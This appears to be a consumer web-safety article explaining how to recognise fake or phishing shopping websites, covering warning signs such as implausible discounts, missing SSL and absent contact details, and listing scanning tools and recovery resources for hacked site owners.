How to Spot a Fake Website

The Anti-Phishing Working Group reports that, in April 2014, 41,759 unique phishing sites were detected. This figure rose to 42,212 in June. Phishing is a serious issue, not just for email users. Phishing scripts can also be deployed on the web. This guide covers both simple and more advanced methods of spotting fake websites so that you can protect yourself from this growing threat. Google does its best to label phishing and malware sites, but a little extra knowledge will ensure you're on your guard at all times.

Basic Tips

When you visit a website, and you suspect that it's not for real, there are a few tell-tale signs that you should look for.

Unusually low prices

Retailers do sometimes offer pretty big discounts, but they aren't likely to give their goods away. If you spot prices that are discounted by 50 percent or more, you should immediately be on your guard. Some sites do sell remnant space or overstocked items, but high-end or premium brand merchandise often still relies on a form of keystone pricing. This pricing model uses a vendor's price as the basis for determining a suggested retail price for consumers. Internet resalers and wholesalers will typically buy goods from a manufacturer, or another wholesaler. They'll then mark up the goods by anything from 100 to 300 percent. This is especially true in industries like jewelry and high-end fashion. So, it's unlikely that a $1,000 ring can be had for just 10% of that price. Good deals come along occasionally, but they are rare, and hard to find. Branded goods selling for less than outlet store prices should always be viewed with suspicion.

No Reviews

If an ecommerce site has become popular, or if it's offering the best deal in town, it will have independent reviews to verify its authenticity. If you see no reviews, be cautious. Watch out for reviews on tiny review websites, or testimonials accredited to generic names. The website you're considering buying from might be a phishing site, or it might be selling counterfeit merchandise. Just because a website is ranking highly in search doesn't mean that the website is authentic or legitimate. Scam artists may be manipulating the search results you see using advertising or sponsored links to gain visibility. Checking reviews is the only way you can verify its reputation.

Poor Grammar and Spelling

Every computer has some form of basic dictionary. Practically every browser has a spell-check tool built in. There's no excuse for spelling mistakes in website content, so any errors should immediately set alarm bells ringing. If the website you're looking at contains numerous spelling and grammatical errors, it might have been put together quickly with the intent of making a quick profit from unsuspecting visitors.

No SSL on the Payment Page

Secure Socket Layer, or SSL, was originally developed by Netscape as a way to securely transport data through various application layers like HTTP, POP3, and LDAP. When you visit a website's payment page, you should see a small padlock icon. This will appear in the browser's URL bar, the status bar, or both. You should also see "https" instead of "http" at the beginning of the URL. If these things are missing, you may be transmitting credit card data over an unsecure internet connection. The website may be trying to collect your credit card data, or it may be exposing your personal financial information. Whether it's doing this intentionally or unintentionally is irrelevant. No reputable ecommerce site would operate without this kind of security.

No Postal Address

Real businesses, selling real products, will provide a physical contact address. Be suspicious of any website that doesn't list the company's physical address or contact information. If the contact address doesn't match the company's true location, try running it through Google Maps to see exactly what's located there. Of course, there are some exceptions to this rule. Google, Amazon, and some other online retailers don't list contact information, or deliberately make it difficult to find. But these brands have already established trust and legitimacy in the marketplace, so it's rare that a customer would have any suspicions. In some countries, it's also illegal to run a website without a contact form or email address.

Terms and Conditions Are Obscured, Missing, or Unfavorable

Most businesses have a generous refund policy, and for good reason. They want you to be happy with their products, so they'll accept returns to encourage you to spend. If a website is selling something, and you cannot find its terms of service, this could leave you at a disadvantage. If it explicitly excludes any possibility of a refund for a normal commodity (eg a purse, jewelry, clothing, electronic device), walk away. Most manufacturers allow for warranties against defects, so this should be covered at the very least. One of the main reasons a business wouldn't offer a warranty is that the company isn't selling authentic merchandise.

The Website Isn't an Authorized Reseller

Many large brands dedicate entire sections of their website to anti-counterfeiting information. This is especially true of brands that have repeatedly been copied or had their trademarks violated in the past. If the website you're visiting doesn't appear to be an authorized reseller, it may be risky to do business with them. The manufacturer may not be willing to back warranty claims from unauthorized sellers, and there is no guarantee of authenticity or quality from the website you're buying from.

Advanced Ways to Spot Phishing on the Web

If you receive a lot of phishing emails, you're probably used to spotting tactics. Some emails are crude enough to give themselves away. On the web, its much easier to mimic a website, or make a store appear genuine to a buyer. These advanced tips can help you to dig deeper if you suspect fraud or malicious content.

Using Online Phishing Scanners

Various free tools allow you to scan a website and check whether its contents are genuine. No one tool can give you a definitive answer, but you can try several to build a picture:
  1. AVG Threat Labs: Type in a URL and get an instant appraisal of its security. AVG reports whether the site has malware, so it's a simple test, but one worth trying.
  2. IsItHacked: Scans the website for signs of possible phishing. It looks for link cloaking, status codes, strange link formatting and iframes. It also scans Google Safe Browse, Phishtank and Site Advisor.
  3. PhishTank: This website contains crowdsourced data about compromised sites on the web, as well as sites that have been set up specifically to phish information from unsuspecting users. It has a phishing checker, a link submission tool, and a verification system. Once you've submitted a suspicious site, you can track it through your PhishTank account.
  4. MXToolbox: Check whether the site is on any blacklists. If a site appears here, it's a sign that it has been reported for having an open relay, which means it's probably firing out spam.

Check Google's Site Status

Google constantly scans websites and flags up malicious content. If it spots a problem, it adds a splash page between the search results page and the website, preventing users from visiting. It also adds a warning under the search engine result. This scanner helps to pick up problems when a legitimate site has been hacked, as well as sites specifically set up for phishing. Even if you don't see a Site Status warning, you can run a manual check on the URL at any time. Be sure to check the date that Google last ran a security scan.

Webmaster Resources

Sometimes, phishing sites aren't originally set up to host malicious content. Any website can be hacked and turned into a phishing site. Whether the hackers use code injection, or they managed to get control of your WordPress, they can embed dangerous code into your website — and putting it right is not easy. Here are some tools that can help if your site is serving phishing content:
  1. Google Webmasters Help for Hacked Sites: If you see a Google warning next to your site in search, head here to learn more and take action. You should use Google's tips if you receive a notification through your Google Search Console account.
  2. Gotmls for WordPress: There are dozens of different security plugins for WordPress, offering myriad tools and protections. But if your site has already been compromised, you need a specialized plugin for the job. Gotmls automatically scans the WordPress install, and both locates and nukes malicious code that isn't supposed to be there. Once you've used it, you can beef up your WordPress security using the plugin.
  3. Google Reconsideration: After fixing your site, contact Google and ask them to review your status. If the malware is gone, you should be good to have all of the malware warnings removed.

Summary

According to NetSafe Canada, phishing attacks lured around 80,000 people each day in 2012. Accurate estimates of the potential cost are difficult to come by. For criminals, phishing isn't always about stealing money from bank accounts. It can be used to steal personal data, which is then sold on and shared. Vigilance is important, but once you know the risks, you'll be much safer when you shop online. Run through some checks if you don't completely trust a website, or if you're tempted to spend with an unknown retailer. On the web, if it looks too good to be true, it almost certainly is.

Further Reading and Resources

We have more guides, tutorials, and infographics related to using the internet safely:

7 Online Scams and How to Avoid Them

It sometimes seems that we would all have flying cars by now if all the energy and creativity that went into stealing from people were used constructively. Check out our infographic, 7 Online Scams and How to Avoid Them. It discusses how people try to scam you and how you can protect yourself.